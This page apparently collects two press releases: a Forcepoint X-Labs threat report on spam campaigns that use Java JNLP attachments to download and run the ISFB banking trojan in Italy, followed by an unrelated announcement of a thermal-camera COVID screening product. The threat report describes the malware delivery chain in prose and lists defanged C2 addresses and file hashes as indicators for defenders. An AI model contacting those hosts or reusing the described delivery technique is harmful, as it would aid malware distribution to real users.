Java Network Launch Protocol – Another way for distributing Java downloaders

September 10, 2020

NEW DELHI, India – September 10, 2020

Forcepoint X-Labs have recently been monitoring emerging malware distribution campaigns that utilize the Java platform. Java downloaders have been a known threat for quite a while, yet there is at least one unexplored feature of the platform that helps to automate malware download and execution. The Java Network Launch Protocol (JNLP) was intended to be a simple mechanism for starting remote Java applications by double clicking on the equivalent of a Windows Link file. It is currently being leveraged as a novel way to auto-execute malicious Java files.

What is Java Web Start?

Java Web Start or Java Network Launch Protocol – as programmers often refer to it – is a protocol using the XML markup language. It was designed for the sole purpose of automatically starting Java applications from a remote location. For that to work the JNLP file must contain a host address and path of the target Java application package (JAR) to be downloaded and executed. Once the user double clicks on a JNLP file, Java would attempt to reach out to the host described in the XML structure, download the specified JAR package and, if successful, execute it. The only prerequisite is the existence of the Java Runtime Environment (JRE) on the local PC.

Side note: If you are unsure whether you have Java installed on your machine, you can perform a quick check as per

https://www.java.com/en/download/help/version_manual.xml

If you do, it might be worth flagging to your IT team. We have been warning of the vulnerable nature of Java since at least 2013.

Figure 1 – Example of a benign JNLP file

It is rather obvious that this functionality provides an appealing opportunity for automating the download and execution of a malicious file.

The Italian Job

Malicious spam campaigns utilizing a JNLP attachment – either as-is, or inside a ZIP archive –   started to appear in recent weeks. The messages seem to be coming from the INPS (Istituto Nazionale della Previdenza Sociale) which is the main entity of Italy’s public retirement system. Interestingly enough, the INPS website was subject to attack in early 2020 as Italian citizens started to apply for benefits; but this time their name is being used as a lure, such is the organization’s relevance.

Figure 2 – Example of a spammed out fake INPS email

It is encouraging people to have a look at their balance and claim a refund by opening the attachment. The logo of INPS is included, however taking a closer look at the sender address, the clumsily written message body, and the attachment, make it easy to see that it is suspicious. Opening the JNLP attachment in a text editor clearly reveals the first stage C2 address.

Figure 3 – Example of a malicious JNLP file

First stage

Visiting the remote location from anywhere but an Italian IP address will result in the server ignoring the request. Considering the exclusively Italian message body along with the .it destination email address indicates the use of geofencing. Whilst visiting the C2 address from the right location results in the download of a small JAR application around 6kb in size. Upon further inspection, this JAR package contains only one Java Class, which is unusual for a benign Java application. Decompilation of the Java bytecode results in a short piece of source code, with yet another suspicious looking remote location and the official website of the INPS. The latter one acting as a decoy, it would be opened in a browser while “nazionale.jpg” is being silently downloaded and executed in the background.

Figure 4 – Example of the decompiled Java Class

Second stage

The second stage C2 contains the final payload in the chain and is also geofenced. Successful download of the “nazionale.jpg” file will only occur if it was requested from an accepted geolocation. Note that in certain cases the content of the “nazionale.jpg” file was later replaced by a benign PuTTY telnet client application before the C2 would become unresponsive – likely the result of a takedown operation.

The payloads

The binaries we’ve been seeing deployed on the second stage C2 were two of a kind so far. Either an NSIS archive with only one embedded file inside, which would be loaded directly into memory and executed by the NSIS script, or a small executable with a custom exepacker on top of it. The commonality between them is the distribution of one of the popular banking trojans, ISFB IAP, a well-known Gozi fork.

Small scale campaigns

There have been only a handful of small-scale campaigns where JNLP files were utilized, with less than a thousand email messages for each, and their attributes changing frequently. The email attachments were quickly altered for the INPS themed emails, instead of JNLP they were reverting back to documents with Excel 4.0 macros within a couple of days. In June Trustwave noted a COVID-19 themed lure pushing TrickBot. We observed yet another completely different JNLP based campaign pushing the NetWire RAT recently. These frequent changes are just reflections of the common TTPs used by threat actors behind these campaigns.

Conclusion

Having autostart functionality in popular applications or platforms doesn’t necessarily mean they are safe to use or were created with security in mind. Most likely they just haven’t been explored and exploited by cybercriminals yet. The Web Start feature of Java is a perfect example that showcases this technique, and has been waiting silently to be revisited by cybercriminals many years after its first malicious use in 2013. Organizations – unless they heavily rely on it – are advised to block JNLP file attachments at the gateway level to prevent unwanted execution along with its consequences.

Protection Statement

Forcepoint customers are protected against this threat at the following stages of attack:

Stage 2 (Lure) – Malicious emails associated with these attacks are identified and blocked.

Stage 5 (Dropper File) – Malicious files are prevented from being downloaded.

Stage 6 (Call Home) – Attempts to contact C2 servers are blocked.

IOCs

C2 Servers

hxxp://social.interactivegood[.]com/

hxxp://gstat.americansreachingmanyservices[.]com/

hxxp://gstat.rayzacastillo[.]com/images/

hxxp://social.farfetchedproductions[.]com/

hxxps://line.campdiy[.]com/

hxxp://gstat.farmlifesupplements[.]com/images/

hxxps://payreceipt.top/receipt/

hxxps://transferreceipt.xyz/bin/

JNLPs

0776f05b3dd4d3e64d67f546c96db8eaeda43dc0

eb754e01f809b42bcf3675a8bd4e5481eab8d08f

b8aa4fbba139b8f783a52c3ba8e8a4091eaf0c05

JARs

10c733da7668d037bd743430523403197641715a

45e2fdc19e91f2264e11a97c70e3ba1d86e8a678

f9419377e43e8e8a911924face6c1660c85957c2

EXEs

cd2faa0ea08db2a1c9c430891c4a82304d3add57

e525bde63dfb455358c5f827b409c2bf2bc3caf6

05e39e5621f3ca78556d9b345b9e3519d066e4bc

8724aaa2cfdbbb2832ffa278c23a11ad04902b5d

40065d1f0bf0b901b339ce476f62295f5e6f8c40 d4e84b7d26bf91c8c5ae104f6467204df5f069cb


iValue in Association with Pixuate and Mobotix Unveil Combat COVID Solution in Government of Karnataka’s Elevate Program

September 10, 2020

Pixuate’s Thermal Solution is identified under Combat Covid-19 Innovation challenge announced at the beginning of the pandemic by the Karnataka Government paving way for the healthier world in the current and post Covid-19 era.

BENGALURU, India – September 10, 2020

iValue InfoSolutions, India’s premium technology enabler, Pixuate an artificial intelligence-based video analytics company and Mobotix a pioneer in the video security industry came together on September 9, 2020 at Government of Karnataka’s Elevate Program held at Vidhana Soudha (Karnataka Vidhana Sabha building) and Bangalore Bioinnovation Centre to unveil Thermal Solution, primarily to combat Covid-19. The innovations were unveiled by Deputy Chief Minister of Karnataka Dr. Ashwathnarayan.    

The thermal solution is developed by using Pixuate’s Intelligent Thermal Analytics Solutions which accurately identifies heat signatures of people and sends instant alerts for all instances of elevated temperature in humans with the help of the feed that comes from Mobotix’s M16B camera which is a stereo camera with optical as well as thermal lens that is used to detect the face, match the region of the face in thermal feed and record highest temperature of the forehead/eye region. This will aid in the current fight against Covid-19 and any such pandemic situations the world may face in the future,” Venkatesh R, Co-Founder and Head – Enterprise Channel Management at iValue InfoSolutions.

The solution unveiled is built around Face Recognition, Automatic Number Plate Recognition, Gear Detection that includes helmet, face mask, gloves, shoes, Gesture Recognition like hand waving, Perimeter Security like loitering, tailgating, unauthorized personnel and other relevant video analytics software programs.

The thermal solution is primarily developed for situations like Covid-19 pandemic which can detect multiple people with elevated body temperature in a crowded and/ public environment like malls, bus stands, railway station which are a mass movement area. The software detects up to 30 people in a single frame for a temperature detection accuracy of +/-0.2 degree Celsius with ~1 seconds detection time. The other use of the thermal solution is to facilitate a contactless entry in office premises using facial recognition based biometric and cross verify the fever symptoms. This helps in social distance compliance, face recognition and mask detection.

Pixuate which is an artificial intelligence based video analytics company headquartered at Bengaluru has been recognized and supported by the Technology Development Board, Government of India’s nodal agency and also awarded as a winner of Elevate Program by Government of Karnataka.

Prathvi Palekar, Founder and CEO of Pixuate says “For the post-COVID world, we launched thermal analytics that offers end to end automation for offices and public places to check compliance for COVID situation. This software is built on Pixuate’s proprietary deep learning based facial recognition engine and it can provide multiple analytics for a single camera feed such as temperature, mask check, social distance check and facial recognition. Along with Thermal Analytics, Pixuate also offers a suite of analytics for automation and surveillance intelligence such as contactless attendance, campus security and city surveillance.

We are excited to have signed up iValue as a distributor for SAARC and Africa region, and expand to the market beyond our current presence in India and UAE.”

Mobotix who have a fleet of both indoor and outdoor camera which are thermal, IP based video systems are a pioneer in the video security industry consider their video systems as computer lenses working intelligently and with embedded storage capacities with the German way of engineering and approaching things as this is appreciated as being particularly innovative and of high quality. Mobotix video systems have been optimized for remote applications and cloud-based technology because the cameras can reduce the bandwidth of the video by scaling the size and the frame rate.

This new technology collaborated between iValue, Pixuate and Mobotix will help the governments across the world and organizations by giving them a chance to fight not just pandemic situation in the future but also help in fighting crime, aiding forensic investigations, find missing people among other benefits.

# # #

About iValue InfoSolutions:

A premium technology enabler, iValue InfoSolutions drives “Go to Market” for Niche, Compelling and Complimentary offerings, “Digital Assets” Protection, Optimization & Transformation area, leveraging Customer Life Cycle and Product Life Cycle Adoption frameworks.

iValue mission is to optimize, protect & transform “Digital Assets” of Organizations, with leading edge & proven offerings, in collaboration with trusted partners. iValue offerings are aligned, customized & optimized for organizations, across vertical & size, through its OEM, consultant & global, national, regional and local system integrators partnership.

iValue has a direct partnership with 35+ “Best of Breed” OEM’s with 7,000+ Customers through 700+ partners. iValue has a direct presence across 13+ locations in multiple continents, with channel, solution, vertical & horizontal focused teams, addressing pre-sales, sales & post sales needs of Customer, Consultants & Partner for Private, Public and Hybrid cloud needs. Apart from India, iValue overseas presence includes Nairobi, Kenya office for Africa foray.

The team at iValue leverage Analytics for its structured and targeted business development at Customers along with AI-driven CRM solution for ensuring profitable growth for its partners and OEM. iValue has been growing consistently at 4+ times market growth rates, at 50%+ CAGR for the last 12+ years.

For more information, visit iValue and follow us on LinkedIn and Twitter.

About Pixuate:

Pixuate is a deep-tech video analytics company offering advanced deep learning and AI technologies. Founded in 2015, Pixuate is registered as Cocoslabs Innovative Solutions Pvt. Ltd., with cutting edge R&D in the area of computer vision, machine learning & AI. Pixuate’s video analytics platform offers solutions like Face Recognition, License Plate Recognition, Thermal Analytics for security and surveillance. During the COVID-19 pandemic, Pixuate’s thermal analytics solutions have been widely sought after by the Governments and Corporates for mass temperature detection of people at public places and offices.

For more information, visit Pixuate.

About MOBOTIX AG:

MOBOTIX is a leading manufacturer of premium-quality intelligent IP video systems, setting standards for innovative camera technologies and decentralized security solutions with the highest level of cybersecurity and GDPR compliant. MOBOTIX was founded in 1999 and is based in Langmeil, Germany. The company conducts its own research and development, and manufactures its own products with the guarantee of excellence attached to “Made in Germany.” Other sales offices are located in New York, Dubai, Sydney, Paris and Madrid. Customers worldwide trust in the durability and reliability of MOBOTIX hardware and software. The flexibility, built-in intelligence and unparalleled data security of the company’s solutions are valued in many industries. MOBOTIX products and solutions help customers in industries such as industrial manufacturing, retail, logistics, and healthcare. With strong international technology partnerships, the company is expanding its universal platform and new applications in a wide variety of areas through the use of artificial intelligence and deep learning modules. For more information, visit MOBOTIX AG.


%d bloggers like this: